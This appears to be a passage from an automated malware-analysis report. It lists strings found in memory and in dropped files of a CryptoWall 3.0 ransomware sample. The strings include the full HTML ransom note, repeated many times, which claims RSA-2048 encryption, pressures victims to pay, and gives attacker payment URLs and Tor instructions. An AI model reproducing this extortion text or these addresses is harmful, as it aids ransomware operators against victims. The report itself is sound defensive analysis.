them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your 
data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/%S" target="_blank">http://aep554w4fm8j.fflroe598qu.com/%S</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/%S" target="_blank">http://aoei243548ld.keedo93i1lo.com/%S</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/%S" target="_blank">https://zpr5huq4bgmutfnf.onion.to/%S</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installation, run the browser and wait for initialization.<br>3. Type in the address b
Source: svcmtr.exe, 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: svcmtr.exe, 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: svcmtr.exe, 0000000C.00000002.387316507.0000000000431000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: svcmtr.exe, 0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: svcmtr.exe, 0000000D.00000002.406449433.0000000000431000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: notepad.exe, 00000015.00000002.875324829.000000000017E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt48.2.dr String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt112.2.dr String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt293.2.dr String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html113.2.dr String found in binary or memory: <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt119.2.dr String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt382.2.dr String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt411.2.dr String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt327.2.dr String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt376.2.dr String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt155.2.dr String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt379.2.dr String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html351.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt404.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt303.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html208.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt133.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt146.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html226.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html267.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html271.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt174.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt292.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt181.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt402.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt397.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt423.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html403.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt261.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt384.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt41.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html53.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for 
other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt126.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html301.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt291.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt116.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html364.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
